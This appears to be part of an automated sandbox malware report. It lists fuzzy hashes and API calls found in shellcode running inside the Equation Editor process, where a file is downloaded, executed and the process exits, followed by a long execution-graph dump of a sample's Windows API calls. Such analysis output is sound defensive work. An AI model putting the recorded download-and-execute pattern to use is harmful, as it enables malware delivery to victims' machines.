                                          • Opcode Fuzzy Hash: 9ccb5035057099be711a01443de9ff6ed063a4c97c623e1e17d4317a6f5189e4
                                          • Instruction Fuzzy Hash: 1831BCE280D3C11FD733D7389C6969ABFA47F93210F1889CED8C64A4E3E6689501C712
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          • URLDownloadToFileW.URLMON(00000000,035D04B5,?,00000000,00000000), ref: 035D050D
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
                                          • ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileProcessShell
                                          • String ID: <
                                          • API String ID: 3584569557-4251816714
                                          • Opcode ID: d5f385a17b452ee4a22e457fc4c247a05a9c49c1dd349752f7b6fb0355ce510c
                                          • Instruction ID: 7361159d2c5b6898473b9589df56e2905a0da340fe745af009da460c53bc2191
                                          • Opcode Fuzzy Hash: d5f385a17b452ee4a22e457fc4c247a05a9c49c1dd349752f7b6fb0355ce510c
                                          • Instruction Fuzzy Hash: 8741CFA580D3C15FD722D738AD69696BF60BF53200F4C8ACED8C64B1F3D6689105C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • URLDownloadToFileW.URLMON(00000000,035D04B5,?,00000000,00000000), ref: 035D050D
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
                                          • ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileProcessShell
                                          • String ID: <
                                          • API String ID: 3584569557-4251816714
                                          • Opcode ID: 49a94e86a8770fc17195f680066e23f45b051e69b97363311493ed90d71f7e2a
                                          • Instruction ID: f4349a8f0b26001faa6cf30969546a596e9f44e83660bdb3c2cbffea30169452
                                          • Opcode Fuzzy Hash: 49a94e86a8770fc17195f680066e23f45b051e69b97363311493ed90d71f7e2a
                                          • Instruction Fuzzy Hash: 9B419DA580D3C15FC723D738AC69696BFA47F93200F188ACFD8C64B4E3E6689505C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileProcessShell
                                          • String ID: <
                                          • API String ID: 3584569557-4251816714
                                          • Opcode ID: 0376f9c17cf50bd03b7457996a0481c395617d7867d88a76ee2b94b831304bfa
                                          • Instruction ID: 7fcab591c204690a443da628c83f31bff68b0ba31dbb05401d39aaf09042ad08
                                          • Opcode Fuzzy Hash: 0376f9c17cf50bd03b7457996a0481c395617d7867d88a76ee2b94b831304bfa
                                          • Instruction Fuzzy Hash: 743169E680D3C15FD733D7389C68696BFA47F96210F5889CE98C64A4E3EA689401C712
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • URLDownloadToFileW.URLMON(00000000,035D04B5,?,00000000,00000000), ref: 035D050D
                                            • Part of subcall function 035D0555: ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
                                            • Part of subcall function 035D0555: ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileProcessShell
                                          • String ID: <
                                          • API String ID: 3584569557-4251816714
                                          • Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                          • Instruction ID: bf64f3cc1cd52e316383634034718274ab66448eaa04c0d27d91a86e0c813b8b
                                          • Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                          • Instruction Fuzzy Hash: FB01F2E540D3805AD371EB38E8987AABFE0BFC0210F0409599C86871F2D938C5048B06
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExecuteExitProcessShell
                                          • String ID:
                                          • API String ID: 1124553745-0
                                          • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                          • Instruction ID: 0d5a1e84642a8be351b85d6d3b64bc84072ae325e1da5e38c87cfad7f109e566
                                          • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                          • Instruction Fuzzy Hash: 6C01ADD848930664DA70F62CE4481BAAE90FB91710FDC8997AC92470F5D5289583CB2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
                                            • Part of subcall function 035D058A: ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExecuteExitProcessShell
                                          • String ID:
                                          • API String ID: 1124553745-0
                                          • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                          • Instruction ID: 02e4f7d7e9c92e7be568e5f9e9500d68baf318374b069b6d454dd16fdcc6d84e
                                          • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                          • Instruction Fuzzy Hash: EDF0AFC998424251DB30E66CF8556FAAF55FB91310FCC88979C92470F5D52891C38B6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                          • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                          • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                          • Instruction ID: e6497bfa2f2ab9d4b1b03695e82783f70b9e7a22076a485739677ca4449748a3
                                          • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                          • Instruction Fuzzy Hash: 4ED05EB5201502CFC314EB08D940E12F37AFFC8211F14C264E4004B669C330E891CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ExitProcess.KERNEL32(035D03D3), ref: 035D03E5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 0576eebe9327ac3463b2cf115f2459228ef26862ba91320d0537bede91d031dc
                                          • Instruction ID: dffc8af2f70df689c8cb2743f028308e893a9d5dee391408388ea44fa20c41ac
                                          • Opcode Fuzzy Hash: 0576eebe9327ac3463b2cf115f2459228ef26862ba91320d0537bede91d031dc
                                          • Instruction Fuzzy Hash: E8E0DF1480E7C15FC622E37C3AAA464BF30BE47100F2808EA80820F0B3E066876A93D2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:16.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:16.3%
                                          Total number of Nodes:1372
                                          Total number of Limit Nodes:22
3576->3591 3578 403da8 3578->3460 3579 40407d 3579->3578 3580 4066ab 17 API calls 3579->3580 3580->3579 3581->3456 3582->3462 3594 404616 3583->3594 3585 4057c6 3589 4057ed 3585->3589 3597 401389 3585->3597 3586 404616 SendMessageW 3587 4057ff OleUninitialize 3586->3587 3587->3492 3589->3586 3590->3576 3592 4066ab 17 API calls 3591->3592 3593 4040ba SetWindowTextW 3592->3593 3593->3579 3595 40462e 3594->3595 3596 40461f SendMessageW 3594->3596 3595->3585 3596->3595 3599 401390 3597->3599 3598 4013fe 3598->3585 3599->3598 3600 4013cb MulDiv SendMessageW 3599->3600 3600->3599 3601 4040cb 3602 4040e3 3601->3602 3603 404244 3601->3603 3602->3603 3606 4040ef 3602->3606 3604 404295 3603->3604 3605 404255 GetDlgItem GetDlgItem 3603->3605 3608 4042ef 3604->3608 3620 401389 2 API calls 3604->3620 3694 4045ca 3605->3694 3609 4040fa SetWindowPos 3606->3609 3610 40410d 3606->3610 3614 404616 SendMessageW 3608->3614 3621 40423f 3608->3621 3609->3610 3611 404116 ShowWindow 3610->3611 3612 404158 3610->3612 3615 404231 3611->3615 3616 404136 GetWindowLongW 3611->3616 3617 404160 DestroyWindow 3612->3617 3618 404177 3612->3618 3613 40427f SetClassLongW 3619 40140b 2 API calls 3613->3619 3622 404301 3614->3622 3680 404631 3615->3680 3616->3615 3623 40414f ShowWindow 3616->3623 3624 404574 3617->3624 3625 40417c SetWindowLongW 3618->3625 3626 40418d 3618->3626 3619->3604 3627 4042c7 3620->3627 3629 40140b 2 API calls 3622->3629 3630 404555 DestroyWindow EndDialog 3622->3630 3635 4066ab 17 API calls 3622->3635 3646 4045ca 18 API calls 3622->3646 3649 4045ca 18 API calls 3622->3649 3623->3612 3624->3621 3633 404584 ShowWindow 3624->3633 3625->3621 3626->3615 3631 404199 GetDlgItem 3626->3631 3627->3608 3632 4042cb SendMessageW 3627->3632 3629->3622 3630->3624 3634 4041aa SendMessageW IsWindowEnabled 3631->3634 3636 4041c7 3631->3636 3632->3621 3633->3621 3634->3621 3634->3636 3635->3622 3637 4041d4 3636->3637 3638 4041e7 3636->3638 3639 40421b SendMessageW 3636->3639 3647 4041cc 
3636->3647 3637->3639 3637->3647 3641 404204 3638->3641 3642 4041ef 3638->3642 3639->3615 3645 40140b 2 API calls 3641->3645 3644 40140b 2 API calls 3642->3644 3643 404202 3643->3615 3644->3647 3648 40420b 3645->3648 3646->3622 3677 4045a3 3647->3677 3648->3615 3648->3647 3650 40437c GetDlgItem 3649->3650 3651 404391 3650->3651 3652 404399 ShowWindow EnableWindow 3650->3652 3651->3652 3697 4045ec EnableWindow 3652->3697 3654 4043c3 EnableWindow 3659 4043d7 3654->3659 3655 4043dc GetSystemMenu EnableMenuItem SendMessageW 3656 40440c SendMessageW 3655->3656 3655->3659 3656->3659 3658 4040ac 18 API calls 3658->3659 3659->3655 3659->3658 3698 4045ff SendMessageW 3659->3698 3699 40666e lstrcpynW 3659->3699 3661 40443b lstrlenW 3662 4066ab 17 API calls 3661->3662 3663 404451 SetWindowTextW 3662->3663 3664 401389 2 API calls 3663->3664 3666 404462 3664->3666 3665 404495 DestroyWindow 3665->3624 3667 4044af CreateDialogParamW 3665->3667 3666->3621 3666->3622 3666->3665 3668 404490 3666->3668 3667->3624 3669 4044e2 3667->3669 3668->3621 3670 4045ca 18 API calls 3669->3670 3671 4044ed GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3670->3671 3672 401389 2 API calls 3671->3672 3673 404533 3672->3673 3673->3621 3674 40453b ShowWindow 3673->3674 3675 404616 SendMessageW 3674->3675 3676 404553 3675->3676 3676->3624 3678 4045b0 SendMessageW 3677->3678 3679 4045aa 3677->3679 3678->3643 3679->3678 3681 404649 GetWindowLongW 3680->3681 3682 4046f4 3680->3682 3681->3682 3683 40465e 3681->3683 3682->3621 3683->3682 3684 40468b GetSysColor 3683->3684 3685 40468e 3683->3685 3684->3685 3686 404694 SetTextColor 3685->3686 3687 40469e SetBkMode 3685->3687 3686->3687 3688 4046b6 GetSysColor 3687->3688 3689 4046bc 3687->3689 3688->3689 3690 4046c3 SetBkColor 3689->3690 3691 4046cd 3689->3691 3690->3691 3691->3682 3692 4046e0 DeleteObject 3691->3692 3693 4046e7 CreateBrushIndirect 3691->3693 3692->3693 3693->3682 3695 4066ab 17 API calls 3694->3695 3696 4045d5 SetDlgItemTextW 3695->3696 
3696->3613 3697->3654 3698->3659 3699->3661 3822 4016cc 3823 402da6 17 API calls 3822->3823 3824 4016d2 GetFullPathNameW 3823->3824 3825 4016ec 3824->3825 3831 40170e 3824->3831 3828 4069a4 2 API calls 3825->3828 3825->3831 3826 401723 GetShortPathNameW 3827 402c2a 3826->3827 3829 4016fe 3828->3829 3829->3831 3832 40666e lstrcpynW 3829->3832 3831->3826 3831->3827 3832->3831 3833 401e4e GetDC 3834 402d84 17 API calls 3833->3834 3835 401e60 GetDeviceCaps MulDiv ReleaseDC 3834->3835 3836 402d84 17 API calls 3835->3836 3837 401e91 3836->3837 3838 4066ab 17 API calls 3837->3838 3839 401ece CreateFontIndirectW 3838->3839 3840 402638 3839->3840 3841 402950 3842 402da6 17 API calls 3841->3842 3844 40295c 3842->3844 3843 402972 3846 406139 2 API calls 3843->3846 3844->3843 3845 402da6 17 API calls 3844->3845 3845->3843 3847 402978 3846->3847 3869 40615e GetFileAttributesW CreateFileW 3847->3869 3849 402985 3850 402a3b 3849->3850 3853 4029a0 GlobalAlloc 3849->3853 3854 402a23 3849->3854 3851 402a42 DeleteFileW 3850->3851 3852 402a55 3850->3852 3851->3852 3853->3854 3855 4029b9 3853->3855 3856 403377 40 API calls 3854->3856 3870 4035fe SetFilePointer 3855->3870 3858 402a30 CloseHandle 3856->3858 3858->3850 3859 4029bf 3860 4035e8 ReadFile 3859->3860 3861 4029c8 GlobalAlloc 3860->3861 3862 4029d8 3861->3862 3863 402a0c 3861->3863 3864 403377 40 API calls 3862->3864 3865 406210 WriteFile 3863->3865 3868 4029e5 3864->3868 3866 402a18 GlobalFree 3865->3866 3866->3854 3867 402a03 GlobalFree 3867->3863 3868->3867 3869->3849 3870->3859 3871 401956 3872 402da6 17 API calls 3871->3872 3873 40195d lstrlenW 3872->3873 3874 402638 3873->3874 3875 4014d7 3876 402d84 17 API calls 3875->3876 3877 4014dd Sleep 3876->3877 3879 402c2a 3877->3879 3880 4020d8 3881 40219c 3880->3881 3882 4020ea 3880->3882 3884 401423 24 API calls 3881->3884 3883 402da6 17 API calls 3882->3883 3885 4020f1 3883->3885 3890 4022f6 3884->3890 3886 402da6 17 API calls 3885->3886 3887 4020fa 3886->3887 3888 402110 
LoadLibraryExW 3887->3888 3889 402102 GetModuleHandleW 3887->3889 3888->3881 3891 402121 3888->3891 3889->3888 3889->3891 3900 406aaa 3891->3900 3894 402132 3897 401423 24 API calls 3894->3897 3898 402142 3894->3898 3895 40216b 3896 4056d0 24 API calls 3895->3896 3896->3898 3897->3898 3898->3890 3899 40218e FreeLibrary 3898->3899 3899->3890 3905 406690 WideCharToMultiByte 3900->3905 3902 406ac7 3903 40212c 3902->3903 3904 406ace GetProcAddress 3902->3904 3903->3894 3903->3895 3904->3903 3905->3902 3906 402b59 3907 402b60 3906->3907 3908 402bab 3906->3908 3910 402ba9 3907->3910 3912 402d84 17 API calls 3907->3912 3909 406a3b 5 API calls 3908->3909 3911 402bb2 3909->3911 3913 402da6 17 API calls 3911->3913 3914 402b6e 3912->3914 3915 402bbb 3913->3915 3916 402d84 17 API calls 3914->3916 3915->3910 3917 402bbf IIDFromString 3915->3917 3919 402b7a 3916->3919 3917->3910 3918 402bce 3917->3918 3918->3910 3924 40666e lstrcpynW 3918->3924 3923 4065b5 wsprintfW 3919->3923 3921 402beb CoTaskMemFree 3921->3910 3923->3910 3924->3921 3925 402a5b 3926 402d84 17 API calls 3925->3926 3927 402a61 3926->3927 3928 402aa4 3927->3928 3929 402a88 3927->3929 3936 40292e 3927->3936 3930 402abe 3928->3930 3931 402aae 3928->3931 3932 402a8d 3929->3932 3933 402a9e 3929->3933 3935 4066ab 17 API calls 3930->3935 3934 402d84 17 API calls 3931->3934 3939 40666e lstrcpynW 3932->3939 3933->3936 3940 4065b5 wsprintfW 3933->3940 3934->3933 3935->3933 3939->3936 3940->3936 3941 403cdb 3942 403ce6 3941->3942 3943 403cea 3942->3943 3944 403ced GlobalAlloc 3942->3944 3944->3943 3713 40175c 3714 402da6 17 API calls 3713->3714 3715 401763 3714->3715 3716 40618d 2 API calls 3715->3716 3717 40176a 3716->3717 3718 40618d 2 API calls 3717->3718 3718->3717 3945 401d5d 3946 402d84 17 API calls 3945->3946 3947 401d6e SetWindowLongW 3946->3947 3948 402c2a 3947->3948 3949 4028de 3950 4028e6 3949->3950 3951 4028ea FindNextFileW 3950->3951 3953 4028fc 3950->3953 3952 402943 3951->3952 3951->3953 3955 40666e 
lstrcpynW 3952->3955 3955->3953 3956 401563 3957 402ba4 3956->3957 3960 4065b5 wsprintfW 3957->3960 3959 402ba9 3960->3959 3961 401968 3962 402d84 17 API calls 3961->3962 3963 40196f 3962->3963 3964 402d84 17 API calls 3963->3964 3965 40197c 3964->3965 3966 402da6 17 API calls 3965->3966 3967 401993 lstrlenW 3966->3967 3969 4019a4 3967->3969 3968 4019e5 3969->3968 3973 40666e lstrcpynW 3969->3973 3971 4019d5 3971->3968 3972 4019da lstrlenW 3971->3972 3972->3968 3973->3971 3974 40166a 3975 402da6 17 API calls 3974->3975 3976 401670 3975->3976 3977 4069a4 2 API calls 3976->3977 3978 401676 3977->3978 3979 402aeb 3980 402d84 17 API calls 3979->3980 3981 402af1 3980->3981 3982 40292e 3981->3982 3983 4066ab 17 API calls 3981->3983 3983->3982 3984 4026ec 3985 402d84 17 API calls 3984->3985 3986 4026fb 3985->3986 3987 402745 ReadFile 3986->3987 3988 4061e1 ReadFile 3986->3988 3989 402785 MultiByteToWideChar 3986->3989 3990 40283a 3986->3990 3993 4027ab SetFilePointer MultiByteToWideChar 3986->3993 3994 40284b 3986->3994 3996 402838 3986->3996 3997 40623f SetFilePointer 3986->3997 3987->3986 3987->3996 3988->3986 3989->3986 4006 4065b5 wsprintfW 3990->4006 3993->3986 3995 40286c SetFilePointer 3994->3995 3994->3996 3995->3996 3998 40625b 3997->3998 4003 406273 3997->4003 3999 4061e1 ReadFile 3998->3999 4000 406267 3999->4000 4001 4062a4 SetFilePointer 4000->4001 4002 40627c SetFilePointer 4000->4002 4000->4003 4001->4003 4002->4001 4004 406287 4002->4004 4003->3986 4005 406210 WriteFile 4004->4005 4005->4003 4006->3996 3719 40176f 3720 402da6 17 API calls 3719->3720 3721 401776 3720->3721 3722 401796 3721->3722 3723 40179e 3721->3723 3758 40666e lstrcpynW 3722->3758 3759 40666e lstrcpynW 3723->3759 3726 40179c 3730 4068f5 5 API calls 3726->3730 3727 4017a9 3728 405f3d 3 API calls 3727->3728 3729 4017af lstrcatW 3728->3729 3729->3726 3746 4017bb 3730->3746 3731 4069a4 2 API calls 3731->3746 3732 406139 2 API calls 3732->3746 3734 4017cd CompareFileTime 3734->3746 3735 
40188d 3737 4056d0 24 API calls 3735->3737 3736 401864 3738 4056d0 24 API calls 3736->3738 3747 401879 3736->3747 3740 401897 3737->3740 3738->3747 3739 40666e lstrcpynW 3739->3746 3741 403377 40 API calls 3740->3741 3742 4018aa 3741->3742 3743 4018be SetFileTime 3742->3743 3745 4018d0 CloseHandle 3742->3745 3743->3745 3744 4066ab 17 API calls 3744->3746 3745->3747 3748 4018e1 3745->3748 3746->3731 3746->3732 3746->3734 3746->3735 3746->3736 3746->3739 3746->3744 3754 405cce MessageBoxIndirectW 3746->3754 3757 40615e GetFileAttributesW CreateFileW 3746->3757 3749 4018e6 3748->3749 3750 4018f9 3748->3750 3752 4066ab 17 API calls 3749->3752 3751 4066ab 17 API calls 3750->3751 3753 401901 3751->3753 3755 4018ee lstrcatW 3752->3755 3756 405cce MessageBoxIndirectW 3753->3756 3754->3746 3755->3753 3756->3747 3757->3746 3758->3726 3759->3727 4007 401a72 4008 402d84 17 API calls 4007->4008 4009 401a7b 4008->4009 4010 402d84 17 API calls 4009->4010 4011 401a20 4010->4011 4012 401573 4013 401583 ShowWindow 4012->4013 4014 40158c 4012->4014 4013->4014 4015 402c2a 4014->4015 4016 40159a ShowWindow 4014->4016 4016->4015 4017 404a74 4018 404a84 4017->4018 4019 404aaa 4017->4019 4020 4045ca 18 API calls 4018->4020 4021 404631 8 API calls 4019->4021 4022 404a91 SetDlgItemTextW 4020->4022 4023 404ab6 4021->4023 4022->4019 4024 4023f4 4025 402da6 17 API calls 4024->4025 4026 402403 4025->4026 4027 402da6 17 API calls 4026->4027 4028 40240c 4027->4028 4029 402da6 17 API calls 4028->4029 4030 402416 GetPrivateProfileStringW 4029->4030 4031 4014f5 SetForegroundWindow 4032 402c2a 4031->4032 4033 401ff6 4034 402da6 17 API calls 4033->4034 4035 401ffd 4034->4035 4036 4069a4 2 API calls 4035->4036 4037 402003 4036->4037 4039 402014 4037->4039 4040 4065b5 wsprintfW 4037->4040 4040->4039 4041 401b77 4042 402da6 17 API calls 4041->4042 4043 401b7e 4042->4043 4044 402d84 17 API calls 4043->4044 4045 401b87 wsprintfW 4044->4045 4046 402c2a 4045->4046 4047 40167b 4048 402da6 17 API calls 
4047->4048 4049 401682 4048->4049 4050 402da6 17 API calls 4049->4050 4051 40168b 4050->4051 4052 402da6 17 API calls 4051->4052 4053 401694 MoveFileW 4052->4053 4054 4016a7 4053->4054 4060 4016a0 4053->4060 4055 4069a4 2 API calls 4054->4055 4056 4022f6 4054->4056 4058 4016b6 4055->4058 4057 401423 24 API calls 4057->4056 4058->4056 4059 40642e 36 API calls 4058->4059 4059->4060 4060->4057 4061 4019ff 4062 402da6 17 API calls 4061->4062 4063 401a06 4062->4063 4064 402da6 17 API calls 4063->4064 4065 401a0f 4064->4065 4066 401a16 lstrcmpiW 4065->4066 4067 401a28 lstrcmpW 4065->4067 4068 401a1c 4066->4068 4067->4068 4069 4022ff 4070 402da6 17 API calls 4069->4070 4071 402305 4070->4071 4072 402da6 17 API calls 4071->4072 4073 40230e 4072->4073 4074 402da6 17 API calls 4073->4074 4075 402317 4074->4075 4076 4069a4 2 API calls 4075->4076 4077 402320 4076->4077 4078 402331 lstrlenW lstrlenW 4077->4078 4079 402324 4077->4079 4081 4056d0 24 API calls 4078->4081 4080 4056d0 24 API calls 4079->4080 4083 40232c 4079->4083 4080->4083 4082 40236f SHFileOperationW 4081->4082 4082->4079 4082->4083 4084 401000 4085 401037 BeginPaint GetClientRect 4084->4085 4086 40100c DefWindowProcW 4084->4086 4087 4010f3 4085->4087 4091 401179 4086->4091 4089 401073 CreateBrushIndirect FillRect DeleteObject 4087->4089 4090 4010fc 4087->4090 4089->4087 4092 401102 CreateFontIndirectW 4090->4092 4093 401167 EndPaint 4090->4093 4092->4093 4094 401112 6 API calls 4092->4094 4093->4091 4094->4093 4095 404700 lstrcpynW lstrlenW 4096 401d81 4097 401d94 GetDlgItem 4096->4097 4098 401d87 4096->4098 4100 401d8e 4097->4100 4099 402d84 17 API calls 4098->4099 4099->4100 4101 401dd5 GetClientRect LoadImageW SendMessageW 4100->4101 4102 402da6 17 API calls 4100->4102 4104 401e33 4101->4104 4106 401e3f 4101->4106 4102->4101 4105 401e38 DeleteObject 4104->4105 4104->4106 4105->4106 4107 401503 4108 40150b 4107->4108 4110 40151e 4107->4110 4109 402d84 17 API calls 4108->4109 4109->4110 4111 402383 4112 40238a 
4111->4112 4114 40239d 4111->4114 4113 4066ab 17 API calls 4112->4113 4115 402397 4113->4115 4116 405cce MessageBoxIndirectW 4115->4116 4116->4114 4117 402c05 SendMessageW 4118 402c1f InvalidateRect 4117->4118 4119 402c2a 4117->4119 4118->4119 4120 404789 4122 4047a1 4120->4122 4128 4048bb 4120->4128 4121 404925 4123 4049ef 4121->4123 4124 40492f GetDlgItem 4121->4124 4125 4045ca 18 API calls 4122->4125 4131 404631 8 API calls 4123->4131 4126 4049b0 4124->4126 4127 404949 4124->4127 4130 404808 4125->4130 4126->4123 4135 4049c2 4126->4135 4127->4126 4134 40496f SendMessageW LoadCursorW SetCursor 4127->4134 4128->4121 4128->4123 4129 4048f6 GetDlgItem SendMessageW 4128->4129 4153 4045ec EnableWindow 4129->4153 4133 4045ca 18 API calls 4130->4133 4141 4049ea 4131->4141 4137 404815 CheckDlgButton 4133->4137 4157 404a38 4134->4157 4139 4049d8 4135->4139 4140 4049c8 SendMessageW 4135->4140 4136 404920 4154 404a14 4136->4154 4151 4045ec EnableWindow 4137->4151 4139->4141 4142 4049de SendMessageW 4139->4142 4140->4139 4142->4141 4146 404833 GetDlgItem 4152 4045ff SendMessageW 4146->4152 4148 404849 SendMessageW 4149 404866 GetSysColor 4148->4149 4150 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4148->4150 4149->4150 4150->4141 4151->4146 4152->4148 4153->4136 4155 404a22 4154->4155 4156 404a27 SendMessageW 4154->4156 4155->4156 4156->4121 4160 405c94 ShellExecuteExW 4157->4160 4159 40499e LoadCursorW SetCursor 4159->4126 4160->4159 4161 40248a 4162 402da6 17 API calls 4161->4162 4163 40249c 4162->4163 4164 402da6 17 API calls 4163->4164 4165 4024a6 4164->4165 4178 402e36 4165->4178 4168 4024de 4170 4024ea 4168->4170 4173 402d84 17 API calls 4168->4173 4169 402da6 17 API calls 4172 4024d4 lstrlenW 4169->4172 4174 402509 RegSetValueExW 4170->4174 4175 403377 40 API calls 4170->4175 4171 40292e 4172->4168 4173->4170 4176 40251f RegCloseKey 4174->4176 4175->4174 4176->4171 4179 402e51 4178->4179 4182 406509 4179->4182 4183 406518 4182->4183 4184 406523 
RegCreateKeyExW 4183->4184 4185 4024b6 4183->4185 4184->4185 4185->4168 4185->4169 4185->4171 4186 40290b 4187 402da6 17 API calls 4186->4187 4188 402912 FindFirstFileW 4187->4188 4189 40293a 4188->4189 4193 402925 4188->4193 4194 4065b5 wsprintfW 4189->4194 4191 402943 4195 40666e lstrcpynW 4191->4195 4194->4191 4195->4193 4196 40190c 4197 401943 4196->4197 4198 402da6 17 API calls 4197->4198 4199 401948 4198->4199 4200 405d7a 67 API calls 4199->4200 4201 401951 4200->4201 4202 40190f 4203 402da6 17 API calls 4202->4203 4204 401916 4203->4204 4205 405cce MessageBoxIndirectW 4204->4205 4206 40191f 4205->4206 4207 40580f 4208 405830 GetDlgItem GetDlgItem GetDlgItem 4207->4208 4209 4059b9 4207->4209 4252 4045ff SendMessageW 4208->4252 4211 4059c2 GetDlgItem CreateThread CloseHandle 4209->4211 4212 4059ea 4209->4212 4211->4212 4214 405a01 ShowWindow ShowWindow 4212->4214 4215 405a3a 4212->4215 4216 405a15 4212->4216 4213 4058a0 4218 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4213->4218 4254 4045ff SendMessageW 4214->4254 4222 404631 8 API calls 4215->4222 4217 405a75 4216->4217 4220 405a29 4216->4220 4221 405a4f ShowWindow 4216->4221 4217->4215 4227 405a83 SendMessageW 4217->4227 4225 405915 4218->4225 4226 4058f9 SendMessageW SendMessageW 4218->4226 4228 4045a3 SendMessageW 4220->4228 4223 405a61 4221->4223 4224 405a6f 4221->4224 4229 405a48 4222->4229 4230 4056d0 24 API calls 4223->4230 4231 4045a3 SendMessageW 4224->4231 4232 405928 4225->4232 4233 40591a SendMessageW 4225->4233 4226->4225 4227->4229 4234 405a9c CreatePopupMenu 4227->4234 4228->4215 4230->4224 4231->4217 4236 4045ca 18 API calls 4232->4236 4233->4232 4235 4066ab 17 API calls 4234->4235 4237 405aac AppendMenuW 4235->4237 4238 405938 4236->4238 4239 405ac9 GetWindowRect 4237->4239 4240 405adc TrackPopupMenu 4237->4240 4241 405941 ShowWindow 4238->4241 4242 